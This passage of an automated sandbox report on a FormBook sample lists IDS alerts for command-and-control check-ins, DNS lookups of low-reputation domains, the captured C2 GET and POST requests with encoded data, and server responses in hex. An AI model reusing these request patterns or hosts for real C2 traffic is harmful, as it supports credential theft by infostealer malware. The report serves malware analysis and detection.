Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49938 -> 172.67.148.163:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50022 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50002 -> 63.250.38.223:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49914 -> 213.142.151.128:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 217.160.0.236:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49988 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 52.20.84.62:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49957 -> 172.67.148.163:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49920 -> 213.142.151.128:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 217.160.0.236:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50006 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 63.250.38.223:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50010 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50018 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 13.248.169.48:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.malekenterprise.xyz
Source:	DNS query: www.publicblockchain.xyz
Source:	DNS query: www.345bet.xyz
Source:	DNS query: www.blogkart4u.xyz

Source: Joe Sandbox View	IP Address: 69.57.163.64 69.57.163.64
Source: Joe Sandbox View	IP Address: 52.20.84.62 52.20.84.62
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View	ASN Name: FORTRESSITXUS FORTRESSITXUS
Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_001A22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_001A22EE

Source: global traffic	HTTP traffic detected: GET /hhkr/?n6z=yDXHTb8HD8B0FVmP&cFo4qVPp=WRQ8nVzWgf/KQb0ffeL0NeJgxUU5jHqpE4F9OlCDBWcYmzOLcWNI7EIKhLkmTG4ytMpH6x968ud+WyJij7QLbIJwcW+dhqiVUREue3Vl8GDkwIDpv7OT1ROf2/+WQnQLdQ== HTTP/1.1Host: www.yard.chatAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /rqbc/?cFo4qVPp=5sg9WStJmed6VjME3Kfe64Nik1rgYAPNNF5Ls1M9hX3++qOsrt9497SUNUde2qgu72/qGY5naHSQYzut4RKpoAqXAdRwjVZiycyJY31uMYphWskLovTcU9ygQLBj8iBjQA==&n6z=yDXHTb8HD8B0FVmP HTTP/1.1Host: www.xdoge.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /simb/?cFo4qVPp=YF5NZKfoWrUTagU3xipk95bNO3A2Uo0Yqz/jxfC4ZHk2x4S5thf0Fhq6ePlTgF/E3KWq/74v03hjGMiGQlMQlmKnYE9E7BYUuZE4fHpLR7BTtKS39AdY/4F0afxmfEc56g==&n6z=yDXHTb8HD8B0FVmP HTTP/1.1Host: www.vibew.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /q0rl/?n6z=yDXHTb8HD8B0FVmP&cFo4qVPp=cjMLiUPNIEKJRugcD5ie306E1QcAw2RoM5jZ77MdzVxw4sbikGHVlnGZceJj7Lt12zvS9KA7LQu5CY7HsPt3d9QMVzjm8TX/TiCqJb1d0kapFpBmHuvsTqQKT62ssgE/bA== HTTP/1.1Host: www.sld6.restAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /2dt5/?cFo4qVPp=4kbHOJ5UYllas5e2iij02JK+boi82emZWDKmHL0N5SGoT/v+gNuEoV69wccNvmLlBapPkisqolcfLKFoOywAfn/pyQhgS3Y9cQfoisPHZ6BJICNGXO8f+j0Ie7KbA724FA==&n6z=yDXHTb8HD8B0FVmP HTTP/1.1Host: www.etkisigorta.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /mc5z/?cFo4qVPp=NpqnvLA9EbuQt0iMwFu/oz6vB3ORQ00reOKN09MhZWvBSGGBRjAjVic3mvcr96DByWV4WVs8Iu37CuPERBjsv3fM8Pj57WQuPC5f+CQlBuOBoI+lIE7zAWoidNLUY1Cfmw==&n6z=yDXHTb8HD8B0FVmP HTTP/1.1Host: www.savposalore.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /t4gy/?cFo4qVPp=tbIjJCDecWG72PJ5fm6b+cp9DyvLm3co3Sr9u1+1s+ZTVcHcO2iEE/p1jUnGhbn0RJW7nG3/a6NuIssH9vveDb5Tnmdc84U29tptzR4JEfSr/8eXrfbz27AkjDSwvm7APQ==&n6z=yDXHTb8HD8B0FVmP HTTP/1.1Host: www.rumgdz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /oxmr/?n6z=yDXHTb8HD8B0FVmP&cFo4qVPp=dkqOKZxAWAfqF14TdagjacdbJGfC3IMP7FxnUgaMU/THCxiFl5t/P/s6rrD/6+ZFKnerhMJxPkxfkyrK3Ba31Wba/08RNoMjY6M9MYNQcDiRsBdQ3tXV2QKU6rS67gFcpw== HTTP/1.1Host: www.malekenterprise.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /alsx/?cFo4qVPp=W7ZSZbLBqSBrvcVxsmXo5NeDybmSShEc+AeEz0V7qSLh5sg23ZZgawUM3DF8n0b743HC/wqdeXgx2Ge7ivufs8IcolhiCsiT4iZC3us4sN3ZfnZKCi658fVTgL5XH1/bqQ==&n6z=yDXHTb8HD8B0FVmP HTTP/1.1Host: www.eatdaba.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /ttj6/?cFo4qVPp=iF0RL9l91cg/r0ryQ96WkUNoN9S7LbfTbsX3VnFoQx5VcqP5rWYrT0esrSS4eYlVGZhUHSx68xLL+nijBbyUGaPQrCH+nQzWW8cftMGt0zfGb8RyPkZsnwIt7raPvb4guA==&n6z=yDXHTb8HD8B0FVmP HTTP/1.1Host: www.publicblockchain.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /4t2c/?cFo4qVPp=hOUZp5zhvvvboVHsfQWKoxRySvJL0REK4o7e+wZhZ0xEWil2dLuRW7oNpvvSf5mmi2LDrhOnXxJLvULiJeHGrTsp0GOtmNUihzsR5ajPaiNnfVTJhdipMI45nZI5L9nepQ==&n6z=yDXHTb8HD8B0FVmP HTTP/1.1Host: www.345bet.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /apzq/?cFo4qVPp=au1daHn9wgKf20+4s5dbudIXdZzi7fKeXAClWCeNG3Sywxkl0XeeTL4ILw5N/PIPOKD1smdtPeAjU/QWU0zFx78Kf7dkU7sR/csTYD8cQMq/1dAzL+BQp22ngcPrvFzIdw==&n6z=yDXHTb8HD8B0FVmP HTTP/1.1Host: www.blogkart4u.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /fxbr/?cFo4qVPp=F/wA59/4/M9Nbi+sYUut4lw4PyasZ4+QWhvhIz395jUmn9BeNZ3e9xnfgjNBe04yuchCnwG0nupCHtnuD77Jv+3LEhLm1rUVkg+1XlcMJ3ZPdBinw8Dy/7vMPWMsxm+Qww==&n6z=yDXHTb8HD8B0FVmP HTTP/1.1Host: www.amzavy.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko

Source: global traffic	DNS traffic detected: DNS query: www.yard.chat
Source: global traffic	DNS traffic detected: DNS query: www.xdoge.live
Source: global traffic	DNS traffic detected: DNS query: www.keertdx.cloud
Source: global traffic	DNS traffic detected: DNS query: www.vibew.live
Source: global traffic	DNS traffic detected: DNS query: www.sld6.rest
Source: global traffic	DNS traffic detected: DNS query: www.etkisigorta.net
Source: global traffic	DNS traffic detected: DNS query: www.savposalore.shop
Source: global traffic	DNS traffic detected: DNS query: www.rumgdz.info
Source: global traffic	DNS traffic detected: DNS query: www.malekenterprise.xyz
Source: global traffic	DNS traffic detected: DNS query: www.eatdaba.shop
Source: global traffic	DNS traffic detected: DNS query: www.publicblockchain.xyz
Source: global traffic	DNS traffic detected: DNS query: www.345bet.xyz
Source: global traffic	DNS traffic detected: DNS query: www.blogkart4u.xyz
Source: global traffic	DNS traffic detected: DNS query: www.amzavy.info
Source: global traffic	DNS traffic detected: DNS query: www.thisisnonft.studio

Source: unknown

HTTP traffic detected: POST /rqbc/ HTTP/1.1Host: www.xdoge.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflateContent-Length: 209Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.xdoge.liveReferer: http://www.xdoge.live/rqbc/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like GeckoData Raw: 63 46 6f 34 71 56 50 70 3d 30 75 49 64 56 6d 51 72 74 4d 39 39 49 69 67 4a 33 75 37 68 71 71 52 4d 79 33 57 48 54 68 66 45 63 46 31 71 2f 41 41 6f 75 42 37 76 39 59 53 6a 6b 34 70 65 2f 49 61 41 4d 33 74 78 77 49 63 65 33 53 6a 32 47 49 49 66 53 68 6e 57 58 43 58 54 79 7a 33 50 75 79 47 68 63 38 5a 49 69 78 78 62 74 4e 79 43 48 57 42 62 53 61 6b 64 64 65 59 6c 69 4e 36 30 58 5a 6d 36 4c 73 59 65 74 6d 49 39 54 37 73 59 39 58 5a 66 64 6f 78 6c 30 49 47 36 76 50 59 66 61 4f 32 4a 46 37 31 4d 4b 4e 4d 58 53 7a 69 49 6f 73 5a 46 6e 4b 54 50 72 4e 52 4d 37 75 54 36 55 6b 31 33 57 37 76 44 64 58 4a 4e 56 35 69 54 5a 61 59 3d Data Ascii: cFo4qVPp=0uIdVmQrtM99IigJ3u7hqqRMy3WHThfEcF1q/AAouB7v9YSjk4pe/IaAM3txwIce3Sj2GIIfShnWXCXTyz3PuyGhc8ZIixxbtNyCHWBbSakddeYliN60XZm6LsYetmI9T7sY9XZfdoxl0IG6vPYfaO2JF71MKNMXSziIosZFnKTPrNRM7uT6Uk13W7vDdXJNV5iTZaY=

Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service Unavailablecontent-length: 107cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:02:39 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:02:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:02:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:02:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Tue, 30 Nov 2021 07:33:06 GMTetag: "328-61a5d3b2-38620fcf47369696;gz"accept-ranges: bytescontent-encoding: gzipvary: Accept-Encodingcontent-length: 456date: Thu, 06 Mar 2025 03:02:09 GMTserver: LiteSpeedx-powered-by: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 7d 53 c1 72 d4 30 0c bd f7 2b 84 2f 85 99 66 c3 32 3d 30 10 e7 00 94 e1 04 3b b4 17 4e 8c d6 d6 d6 a6 8e 1d 6c 25 db fd 7b 94 ec 6e 1b 0e 70 92 a3 a7 f7 a4 27 3b cd 8b 4f df 3e de fd d8 dc 80 e3 2e b4 17 cd 14 20 60 bc d7 8a a2 9a 12 84 b6 bd 00 68 3a 62 04 e3 30 17 62 ad 06 de 55 6f d5 33 e0 98 fb 8a 7e 0f 7e d4 ea b1 1a b0 32 a9 eb 91 fd 36 90 02 93 22 53 14 96 27 4d f6 9e 16 bc 88 1d 69 35 7a da f7 29 f3 a2 74 ef 2d 3b 6d 69 f4 86 aa f9 e3 0a 7c f4 ec 31 54 c5 60 20 bd be 82 e2 b2 8f 0f 15 a7 6a e7 59 c7 74 14 66 cf 81 da eb d7 d7 f0 35 31 7c 4e 43 b4 4d 7d 4c 4e 70 10 0a 64 0a 5a 15 3e 04 2a 8e 48 1a bb 4c 3b ad 6a ca 39 e5 9f 36 99 52 1f d1 95 29 65 da 43 7d 5c 44 b3 4d f6 20 c1 fa 11 4c c0 52 b4 ea f1 ec 68 91 ec d0 c7 39 29 69 b7 6e 6f 29 8f 94 e1 66 52 17 a9 f5 09 59 10 e6 c6 b2 35 2b 5a 32 7a 53 0b 76 e6 bf 69 37 d2 63 e9 46 52 47 ac 3f f3 83 8c a7 da 3b e7 0b 4c 03 01 79 76 d2 d1 26 2a f1 92 81 1e 7d e1 2b 48 19 3c 43 97 46 b2 50 52 47 7b a9 91 da 50 68 d5 d4 fd b9 5f ae cf ea 22 88 7c 59 60 2f 01 0e 69 00 83 51 34 9f 6b 17 0e 1c 85 be 42 c3 3e c5 72 b2 2e 05 78 da ec 2f 1c b1 98 ec 7b 7e 17 92 c1 a9 6a 25 97 90 d0 be 7c f5 5e b5 df e7 23 4c 3e 9b 1a ff c7 16 87 9c f2 61 b5 45 f3 30 53 3f c8 01 38 c1 26 cb 63 49 43 f9 a7 48 ad da 2f e2 f9 6f fc 69 d1 a7 c3 53 38 5d 74 3d ff 18 7f 00 b9 8c 78 1e 28 03 00 00 Data Ascii: }Sr0+/f2=0;Nl%{np';O>. `h:b0bUo3~~26"S'Mi5z)t-;mi\|1T` 